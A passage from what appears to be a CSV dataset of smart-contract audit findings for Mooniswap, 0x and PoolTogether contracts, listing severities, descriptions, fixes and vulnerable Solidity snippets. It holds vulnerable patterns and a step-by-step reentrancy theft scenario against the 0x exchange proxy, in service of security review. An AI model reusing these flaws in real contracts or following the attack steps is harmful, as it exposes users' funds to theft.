(isETH(token)) {\\n require(msg.value >= amount, ""UniERC20: not enough value"");\\n if (msg.value > amount) {\\n // Return remainder if exist\\n from.transfer(msg.value.sub(amount));\\n }\\n } else {\\n token.safeTransferFrom(from, to, amount);\\n }\\n }\\n}\\n```\\n\\nIn case if the function is called for the normal ERC-20 token, everything works as expected. The tokens are transferred `from` the `from` address `to` the `to` address. 
If the token is ETH, the transfer is expected `to` be `from` the `msg.sender` `to` `this` contract, even if the `to` and `from` parameters are different.\\nThis issue's severity is not high because the function is always called with the proper parameters in the current codebase.","Resolution\\nAccording to the client, this issue is addressed in 1inch-exchange/[email protected]d0ffb6f.\\n(This fix is as reported by the developer team, but has not been verified by Diligence).\\nMake sure that the `uniTransferFrom` function is always called with expected parameters.",,"```\\nfunction uniTransferFrom(IERC20 token, address payable from, address to, uint256 amount) internal {\\n    if (amount > 0) {\\n        if (isETH(token)) {\\n            require(msg.value >= amount, ""UniERC20: not enough value"");\\n            if (msg.value > amount) {\\n                // Return remainder if exist\\n                from.transfer(msg.value.sub(amount));\\n            }\\n        } else {\\n            token.safeTransferFrom(from, to, amount);\\n        }\\n    }\\n}\\n```\\n"
+MooniswapGovernance - votingpower is not accurately reflected when minting pool tokens Unverified,medium,"When a user provides liquidity to the pool, pool-tokens are minted. The minting event triggers the `_beforeTokenTransfer` callback in `MooniswapGovernance` which updates voting power reflecting the newly minted stake for the user.\\nThere seems to be a copy-paste error in the way `balanceTo` is determined that sets `balanceTo` to zero if new tokens were minted (from==address(0)). This means that in a later call to `_updateOnTransfer` only the newly minted amount is considered when adjusting voting power.\\nIf tokens are newly minted `from==address(0)` and therefore `balanceTo -> 0`.\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n    uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n    uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n    uint256 newTotalSupply = totalSupply()\\n        .add(from == address(0) ? 
amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n\\nnow, `balanceTo` is zero which would adjust voting power to `amount` instead of the user's actual balance + the newly minted token.\\n```\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\n",`balanceTo` should be zero when burning (to == address(0)) and `balanceOf(to)` when minting.\\ne.g. like this:\\n```\\nuint256 balanceTo = (to != address(0)) ? balanceOf(to) : 0;\\n```\\n,,"```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n```\\n" +MooniswapGovernance - _beforeTokenTransfer should not update voting power on transfers to self Unverified,medium,"Mooniswap governance is based on the liquidity voting system that is also employed by the mothership or for factory governance. In contrast to traditional voting systems where users vote for discrete values, the liquidity voting system derives a continuous weighted averaged “consensus” value from all the votes. 
Thus it is required that whenever stake changes in the system, all the parameters that can be voted upon are updated with the new weights for a specific user.\\nThe Mooniswap pool is governed by liquidity providers and liquidity tokens are the stake that gives voting rights in `MooniswapGovernance`. Thus whenever liquidity tokens are transferred to another address, stake and voting values need to be updated. This is handled by `MooniswapGovernance._beforeTokenTransfer()`.\\nIn the special case where someone triggers a token transfer where the `from` address equals the `to` address, effectively sending the token `to` themselves, no update on voting power should be performed. Instead, voting power is first updated with `balance - amount` and then with `balance + amount` which in the worst case means it is updating first `to` a zero balance and then `to` 2x the balance.\\nUltimately this should not have an effect on the overall outcome but is unnecessary and wasting gas.\\n`beforeTokenTransfer` callback in `Mooniswap` does not check for the NOP case where `from==to`\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? 
amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n\\nwhich leads to `updateBalance` being called on the same address twice, first with `currentBalance - amountTransferred` and then with `currentBalance + amountTransferred`.\\n```\\nif (params.from != address(0)) {\\n votingData.updateBalance(params.from, voteFrom, params.balanceFrom, params.balanceFrom.sub(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n\\nif (params.to != address(0)) {\\n votingData.updateBalance(params.to, voteTo, params.balanceTo, params.balanceTo.add(params.amount), params.newTotalSupply, defaultValue, emitEvent);\\n}\\n```\\n",Do not update voting power on LP token transfers where `from == to`.,,"```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal override {\\n uint256 balanceFrom = (from != address(0)) ? balanceOf(from) : 0;\\n uint256 balanceTo = (from != address(0)) ? balanceOf(to) : 0;\\n uint256 newTotalSupply = totalSupply()\\n .add(from == address(0) ? amount : 0)\\n .sub(to == address(0) ? 
amount : 0);\\n\\n ParamsHelper memory params = ParamsHelper({\\n from: from,\\n to: to,\\n amount: amount,\\n balanceFrom: balanceFrom,\\n balanceTo: balanceTo,\\n newTotalSupply: newTotalSupply\\n });\\n\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultFee, \\_emitFeeVoteUpdate, \\_fee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultSlippageFee, \\_emitSlippageFeeVoteUpdate, \\_slippageFee);\\n \\_updateOnTransfer(params, mooniswapFactoryGovernance.defaultDecayPeriod, \\_emitDecayPeriodVoteUpdate, \\_decayPeriod);\\n}\\n```\\n" +Unpredictable behavior for users due to admin front running or general bad timing,medium,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nMooniswapFactoryGovernance - Admin opportunity to lock `swapFor` with a referral when setting an invalid `referralFeeReceiver`\\n`setReferralFeeReceiver` and `setGovernanceFeeReceiver` takes effect immediately.\\n```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n\\n`setReferralFeeReceiver` can be used to set an invalid receiver address (or one that reverts on every call) effectively rendering `Mooniswap.swapFor` unusable if a referral was specified in the swap.\\n```\\nif (referral != address(0)) {\\n referralShare = invIncrease.mul(referralShare).div(\\_FEE\\_DENOMINATOR);\\n if (referralShare > 0) {\\n if (referralFeeReceiver != address(0)) {\\n 
\\_mint(referralFeeReceiver, referralShare);\\n IReferralFeeReceiver(referralFeeReceiver).updateReward(referral, referralShare);\\n```\\n\\nLocking staked token\\nAt any point in time and without prior notice to users an admin may accidentally or intentionally add a broken governance sub-module to the system that blocks all users from unstaking their `1INCH` token. An admin can recover from this by removing the broken sub-module, however, with malicious intent tokens may be locked forever.\\nSince `1INCH` token gives voting power in the system, tokens are considered to hold value for other users and may be traded on exchanges. This raises concerns if tokens can be locked in a contract by one actor.\\nAn admin adds an invalid address or a malicious sub-module to the governance contract that always `reverts` on calls to `notifyStakeChanged`.\\n```\\nfunction addModule(address module) external onlyOwner {\\n require(\\_modules.add(module), ""Module already registered"");\\n emit AddModule(module);\\n}\\n```\\n\\n```\\nfunction \\_notifyFor(address account, uint256 balance) private {\\n uint256 modulesLength = \\_modules.length();\\n for (uint256 i = 0; i < modulesLength; ++i) {\\n IGovernanceModule(\\_modules.at(i)).notifyStakeChanged(account, balance);\\n }\\n}\\n```\\n\\nAdmin front-running to prevent user stake sync\\nAn admin may front-run users while staking in an attempt to prevent submodules from being notified of the stake update. This is unlikely to happen as it incurs costs for the attacker (front-back-running) to normal users but may be an interesting attack scenario to exclude a whale's stake from voting.\\nFor example, an admin may front-run `stake()` or `notoify*()` by briefly removing all governance submodules from the mothership and re-adding them after the users call succeeded. The stake-update will not be propagated to the sub-modules. 
A user may only detect this when they are voting (if they had no stake before) or when they actually check their stake. Such an attack would likely stay unnoticed unless someone listens for `AddModule`/`RemoveModule` events on the contract.\\nAn admin front-runs a transaction by removing all modules and re-adding them afterwards to prevent the stake from propagating to the submodules.\\n```\\nfunction removeModule(address module) external onlyOwner {\\n    require(\\_modules.remove(module), ""Module was not registered"");\\n    emit RemoveModule(module);\\n}\\n```\\n\\nAdmin front-running to prevent unstake from propagating\\nAn admin may choose to front-run their own `unstake()`, temporarily removing all governance sub-modules, preventing `unstake()` from syncing the action to sub-modules while still getting their previously staked tokens out. The governance sub-modules can be re-added right after unstaking. Due to double-accounting of the stake (in governance and in every sub-module), their stake will still be exercisable in the sub-module even though it was removed from the mothership. Users can only prevent this by manually calling a state-sync on the affected account(s).","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter changes and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nFurthermore, users should be guaranteed to be able to redeem their staked tokens. 
An entity - even though trusted - in the system should not be able to lock tokens indefinitely.",,```\\nfunction setReferralFeeReceiver(address newReferralFeeReceiver) external onlyOwner {\\n referralFeeReceiver = newReferralFeeReceiver;\\n emit ReferralFeeReceiverUpdate(newReferralFeeReceiver);\\n}\\n```\\n +The owner can borrow token0/token1 in the rescueFunds,low,"If some random tokens/funds are accidentally transferred to the pool, the `owner` can call the `rescueFunds` function to withdraw any funds manually:\\n```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, ""Mooniswap: access denied"");\\n require(token1.uniBalanceOf(address(this)) >= balance1, ""Mooniswap: access denied"");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, ""Mooniswap: access denied"");\\n}\\n```\\n\\nThere's no restriction on which funds the `owner` can try to withdraw and which token to call. It's theoretically possible to transfer pool tokens and then return them to the contract (e.g. in the case of ERC-777). 
That action would be similar to a free flash loan.",Explicitly check that the `token` is not equal to any of the pool tokens.,,"```\\nfunction rescueFunds(IERC20 token, uint256 amount) external nonReentrant onlyOwner {\\n uint256 balance0 = token0.uniBalanceOf(address(this));\\n uint256 balance1 = token1.uniBalanceOf(address(this));\\n\\n token.uniTransfer(msg.sender, amount);\\n\\n require(token0.uniBalanceOf(address(this)) >= balance0, ""Mooniswap: access denied"");\\n require(token1.uniBalanceOf(address(this)) >= balance1, ""Mooniswap: access denied"");\\n require(balanceOf(address(this)) >= \\_BASE\\_SUPPLY, ""Mooniswap: access denied"");\\n}\\n```\\n" +Ether temporarily held during transactions can be stolen via reentrancy,high,"The exchange proxy typically holds no ether balance, but it can temporarily hold a balance during a transaction. This balance is vulnerable to theft if the following conditions are met:\\nNo check at the end of the transaction reverts if ether goes missing,\\nreentrancy is possible during the transaction, and\\na mechanism exists to spend ether held by the exchange proxy.\\nWe found one example where these conditions are met, but it's possible that more exist.\\nExample\\n`MetaTransactionsFeature.executeMetaTransaction()` accepts ether, which is used to pay protocol fees. It's possible for less than the full amount in `msg.value` to be consumed, which is why the function uses the `refundsAttachedEth` modifier to return any remaining ether to the caller:\\n```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n\\nNotice that this modifier just returns the remaining ether balance (up to msg.value). It does not check for a specific amount of remaining ether. 
This meets condition (1) above.\\nIt's impossible to reenter the system with a second metatransaction because `executeMetaTransaction()` uses the modifier `nonReentrant`, but there's nothing preventing reentrancy via a different feature. We can achieve reentrancy by trading a token that uses callbacks (e.g. ERC777's hooks) during transfers. This meets condition (2).\\nTo find a full exploit, we also need a way to extract the ether held by the exchange proxy. `LiquidityProviderFeature.sellToLiquidityProvider()` provides such a mechanism. By passing `ETH_TOKEN_ADDRESS` as the `inputToken` and an address in the attacker's control as the `provider`, an attacker can transfer out any ether held by the exchange proxy. Note that `sellToLiquidityProvider()` can transfer any amount of ether, not limited to the amount sent via msg.value:\\n```\\nif (inputToken == ETH\\_TOKEN\\_ADDRESS) {\\n provider.transfer(sellAmount);\\n```\\n\\nThis meets condition (3).\\nThe full steps to exploit this vulnerability are as follows:\\nA maker/attacker signs a trade where one of the tokens will invoke a callback during the trade.\\nA taker signs a metatransaction to take this trade.\\nA relayer sends in the metatransaction, providing more ether than is necessary to pay the protocol fee. (It's unclear how likely this situation is.)\\nDuring the token callback, the attacker invokes `LiquidityProviderFeature.sellToLiquidityProvider()` to transfer the excess ether to their account.\\nThe metatransaction feature returns the remaining ether balance, which is now zero.","In general, we recommend using strict accounting of ether throughout the system. If there's ever a temporary balance, it should be accurately resolved at the end of the transaction, after any potential reentrancy opportunities.\\nFor the example we specifically found, we recommend doing strict accounting in the metatransactions feature. 
This means features called via a metatransaction would need to return how much ether was consumed. The metatransactions feature could then refund exactly `msg.value - `. The transaction should be reverted if this fails because it means ether went missing during the transaction.\\nWe also recommend limiting `sellToLiquidityProvider()` to only transfer up to `msg.value`. This is a form of defense in depth in case other vectors for a similar attack exist.",,"```\\n/// @dev Refunds up to `msg.value` leftover ETH at the end of the call.\\nmodifier refundsAttachedEth() {\\n \\_;\\n uint256 remainingBalance =\\n LibSafeMathV06.min256(msg.value, address(this).balance);\\n if (remainingBalance > 0) {\\n msg.sender.transfer(remainingBalance);\\n }\\n}\\n```\\n" +UniswapFeature: Non-static call to ERC20.allowance(),low,"In the case where a token is possibly “greedy” (consumes all gas on failure), `UniswapFeature` makes a call to the token's `allowance()` function to check whether the user has provided a token allowance to the protocol proxy or to the `AllowanceTarget`. This call is made using `call()`, potentially allowing state-changing operations to take place before control of the execution returns to `UniswapFeature`.\\n```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n",Replace the `call()` with a `staticcall()`.,,"```\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n" +UniswapFeature: Unchecked returndatasize in low-level external calls,low,"`UniswapFeature` makes a number of external calls from low-level assembly code. Two of these calls rely on the `CALL` opcode to copy the returndata to memory without checking that the call returned the expected amount of data. 
Because the `CALL` opcode does not zero memory if the call returns less data than expected, this can lead to usage of dirty memory under the assumption that it is data returned from the most recent call.\\nCall to `UniswapV2Pair.getReserves()`\\n```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n\\nCall to `ERC20.allowance()`\\n```\\n// Check if we have enough direct allowance by calling\\n// `token.allowance()``\\nmstore(0xB00, ALLOWANCE\\_CALL\\_SELECTOR\\_32)\\nmstore(0xB04, caller())\\nmstore(0xB24, address())\\nlet success := call(gas(), token, 0, 0xB00, 0x44, 0xC00, 0x20)\\n```\\n","Instead of providing a memory range for `call()` to write returndata to, explicitly check `returndatasize()` after the call is made and then copy the data into memory using `returndatacopy()`.\\n```\\nif lt(returndatasize(), EXPECTED\\_SIZE) {\\n revert(0, 0) \\n}\\nreturndatacopy(0xC00, 0x00, EXPECTED\\_SIZE)\\n```\\n",,"```\\n// Call pair.getReserves(), store the results at `0xC00`\\nmstore(0xB00, UNISWAP\\_PAIR\\_RESERVES\\_CALL\\_SELECTOR\\_32)\\nif iszero(staticcall(gas(), pair, 0xB00, 0x4, 0xC00, 0x40)) {\\n bubbleRevert()\\n}\\n```\\n" +PeriodicPrizeStrategy - RNG failure can lock user funds,high,"To prevent manipulation of the `SortitionSumTree` after a requested random number enters the mempool, users are unable to withdraw funds while the strategy contract waits on a random number request between execution of `startAward()` and `completeAward()`.\\nIf an rng request fails, however, there is no way to exit this locked state. After an rng request times out, only `startAward()` can be called, which will make another rng request and re-enter the same locked state. The rng provider can also not be updated while the contract is in this state. 
If the rng provider fails permanently, user funds are permanently locked.\\n`requireNotLocked()` prevents transfers, deposits, or withdrawals when there is a pending award.\\n```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n\\n```\\nfunction \\_requireNotLocked() internal view {\\n uint256 currentBlock = \\_currentBlock();\\n require(rngRequest.lockBlock == 0 || currentBlock < rngRequest.lockBlock, ""PeriodicPrizeStrategy/rng-in-flight"");\\n}\\n```\\n\\n`setRngService()` reverts if there is a pending or timed-out rng request\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), ""PeriodicPrizeStrategy/rng-in-flight"");\\n```\\n","Instead of forcing the pending award phase to be re-entered in the event of an rng request time-out, provide an `exitAwardPhase()` function that ends the award phase without paying out the award. This will at least allow users to withdraw their funds in the event of a catastrophic failure of the rng service. It may also be prudent to allow the rng service to be updated in the event of an rng request time out.",,"```\\nfunction beforeTokenTransfer(address from, address to, uint256 amount, address controlledToken) external override onlyPrizePool {\\n if (controlledToken == address(ticket)) {\\n \\_requireNotLocked();\\n }\\n```\\n" +LootBox - Unprotected selfdestruct in proxy implementation,high,"When the `LootBoxController` is deployed, it also deploys an instance of `LootBox`. 
When someone calls `LootBoxController.plunder()` or `LootBoxController.executeCall()` the controller actually deploys a temporary proxy contract to a deterministic address using `create2`, then calls out to it to collect the loot.\\nThe `LootBox` implementation contract is completely unprotected, exposing all its functionality to any actor on the blockchain. The most critical functionality is actually the `LootBox.destroy()` method that calls `selfdestruct()` on the implementation contract.\\nTherefore, an unauthenticated user can `selfdestruct` the `LootBox` proxy implementation and cause the complete system to become dysfunctional. As an effect, none of the AirDrops that were delivered based on this contract will be redeemable (Note: `create2` deploy address is calculated from the current contract address and salt). Funds may be lost.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n\\n```\\n/// @notice Destroys this contract using `selfdestruct`\\n/// @param to The address to send remaining Ether to\\nfunction destroy(address payable to) external {\\n selfdestruct(to);\\n}\\n```\\n\\nnot in scope but listed for completeness\\n```\\ncontract CounterfactualAction {\\n function depositTo(address payable user, PrizePool prizePool, address output, address referrer) external {\\n IERC20 token = IERC20(prizePool.token());\\n uint256 amount = token.balanceOf(address(this));\\n token.approve(address(prizePool), amount);\\n prizePool.depositTo(user, amount, output, referrer);\\n selfdestruct(user);\\n }\\n\\n function cancel(address payable user, PrizePool prizePool) external {\\n IERC20 token = IERC20(prizePool.token());\\n token.transfer(user, token.balanceOf(address(this)));\\n selfdestruct(user);\\n }\\n```\\n",Enforce that only the deployer of the contract can call functionality in the contract. 
Make sure that nobody can destroy the implementation of proxy contracts.,,```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n +PeriodicPriceStrategy - trustedForwarder can impersonate any msg.sender,high,"The `trustedForwarder` undermines the trust assumptions in the system. For example, one would assume that the access control modifier `onlyPrizePool` would only allow the configured `PrizePool` to call certain methods. However, in reality, the `trustedForwarder` can assume this position as well. The same is true for the `onlyOwnerOrListener` modifier. One would assume `msg.sender` must either be `periodicPrizeStrategyListener` or `owner` (the initial deployer) while the `trustedForwarder` can assume any of the administrative roles.\\nThe centralization of power to allow one account to impersonate other components and roles (owner, `listener`, prizePool) in the system is a concern by itself and may give users pause when deciding whether to trust the contract system. The fact that the `trustedForwarder` can spoof events for any `msg.sender` may also make it hard to keep an accurate log trail of events in case of a security incident.\\nNote: The same functionality seems to be used in `ControlledToken` and other contracts which allows the `trustedForwarder` to assume any tokenholder in `ERC20UpgradeSafe`. 
There is practically no guarantee to `ControlledToken` holders.\\nNote: The trustedForwarder/msgSender() pattern is used in multiple contracts, many of which are not in the scope of this assessment.\\naccess control modifiers that can be impersonated\\n```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), ""PeriodicPrizeStrategy/only-prize-pool"");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyOwnerOrListener() {\\n require(\\_msgSender() == owner() || \\_msgSender() == address(periodicPrizeStrategyListener), ""PeriodicPrizeStrategy/only-owner-or-listener"");\\n \\_;\\n}\\n```\\n\\nevent `msg.sender` that can be spoofed because the actual `msg.sender` can be `trustedForwarder`\\n```\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n```\\nemit PrizePoolAwardStarted(\\_msgSender(), address(prizePool), requestId, lockBlock);\\n```\\n\\n```\\nemit PrizePoolAwarded(\\_msgSender(), randomNumber);\\nemit PrizePoolOpened(\\_msgSender(), prizePeriodStartedAt);\\n```\\n\\n`_msgSender()` implementation allows the `trustedForwarder` to impersonate any `msg.sender` address\\n```\\n/// @dev Provides information about the current execution context for GSN Meta-Txs.\\n/// @return The payable address of the message sender\\nfunction \\_msgSender()\\n internal\\n override(BaseRelayRecipient, ContextUpgradeSafe)\\n virtual\\n view\\n returns (address payable)\\n{\\n return BaseRelayRecipient.\\_msgSender();\\n}\\n```\\n",Remove the `trustedForwarder` or restrict the type of actions the forwarder can perform and don't allow it to impersonate other components in the system. Make sure users understand the trust assumptions and who has what powers in the system. 
Make sure to keep an accurate log trail of who performed which action on whom's behalf.,,"```\\nmodifier onlyPrizePool() {\\n require(\\_msgSender() == address(prizePool), ""PeriodicPrizeStrategy/only-prize-pool"");\\n \\_;\\n}\\n```\\n" +Unpredictable behavior for users due to admin front running or general bad timing,high,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nAn administrator (deployer) of `MultipleWinners` can change the number of winners in the system without warning. This has the potential to violate a security goal of the system.\\nadmin can change the number of winners during a prize-draw period\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may switch-out RNG service at any time (when RNG is not in inflight or timed-out)\\n```\\nfunction setRngService(RNGInterface rngService) external onlyOwner {\\n require(!isRngRequested(), ""PeriodicPrizeStrategy/rng-in-flight"");\\n\\n rng = rngService;\\n emit RngServiceUpdated(address(rngService));\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin can effectively disable the rng request timeout by setting a high value during a prize-draw (e.g. 
to indefinitely block payouts)\\n```\\nfunction setRngRequestTimeout(uint32 \\_rngRequestTimeout) external onlyOwner {\\n \\_setRngRequestTimeout(\\_rngRequestTimeout);\\n}\\n```\\n\\n`PeriodicPriceStrategy` - admin may set new tokenListener which might intentionally block token-transfers\\n```\\nfunction setTokenListener(TokenListenerInterface \\_tokenListener) external onlyOwner {\\n tokenListener = \\_tokenListener;\\n\\n emit TokenListenerUpdated(address(tokenListener));\\n}\\n```\\n\\n```\\nfunction setPeriodicPrizeStrategyListener(address \\_periodicPrizeStrategyListener) external onlyOwner {\\n periodicPrizeStrategyListener = PeriodicPrizeStrategyListener(\\_periodicPrizeStrategyListener);\\n\\n emit PeriodicPrizeStrategyListenerSet(\\_periodicPrizeStrategyListener);\\n}\\n```\\n\\nout of scope but mentioned as a relevant example: `PrizePool` owner can set new `PrizeStrategy` at any time\\n```\\n/// @notice Sets the prize strategy of the prize pool. Only callable by the owner.\\n/// @param \\_prizeStrategy The new prize strategy\\nfunction setPrizeStrategy(address \\_prizeStrategy) external override onlyOwner {\\n \\_setPrizeStrategy(TokenListenerInterface(\\_prizeStrategy));\\n}\\n```\\n\\na malicious admin may remove all external ERC20/ERC721 token awards prior to the user claiming them (admin front-running opportunity)\\n```\\nfunction removeExternalErc20Award(address \\_externalErc20, address \\_prevExternalErc20) external onlyOwner {\\n externalErc20s.removeAddress(\\_prevExternalErc20, \\_externalErc20);\\n emit ExternalErc20AwardRemoved(\\_externalErc20);\\n}\\n```\\n\\n```\\nfunction removeExternalErc721Award(address \\_externalErc721, address \\_prevExternalErc721) external onlyOwner {\\n externalErc721s.removeAddress(\\_prevExternalErc721, \\_externalErc721);\\n delete externalErc721TokenIds[\\_externalErc721];\\n emit ExternalErc721AwardRemoved(\\_externalErc721);\\n}\\n```\\n\\nthe `PeriodicPrizeStrategy` `owner` (also see concerns outlined in 
issue 5.4) can transfer external ERC20 at any time to avoid them being awarded to users. There is no guarantee to the user.\\n```\\nfunction transferExternalERC20(\\n address to,\\n address externalToken,\\n uint256 amount\\n)\\n external\\n onlyOwner\\n{\\n prizePool.transferExternalERC20(to, externalToken, amount);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter changes and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.",,```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n +PeriodicPrizeStrategy - addExternalErc721Award duplicate or invalid tokenIds may block award phase,medium,"The prize-strategy owner (or a listener) can add `ERC721` token awards by calling `addExternalErc721Award` providing the `ERC721` token address and a list of `tokenIds` owned by the prizePool. 
This may cause an exception when `_awardExternalErc721s` calls `prizePool.awardExternalERC721` to transfer an invalid or previously transferred token, blocking the award phase.\\nNote: An admin can recover from this situation by removing and re-adding the `ERC721` token from the awards list.\\nadding `tokenIds`\\n```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), ""PeriodicPrizeStrategy/external-erc721-not-contract"");\\n require(prizePool.canAwardExternal(\\_externalErc721), ""PeriodicPrizeStrategy/cannot-award-external"");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), ""PeriodicPrizeStrategy/unavailable-token"");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n\\nawarding tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != 
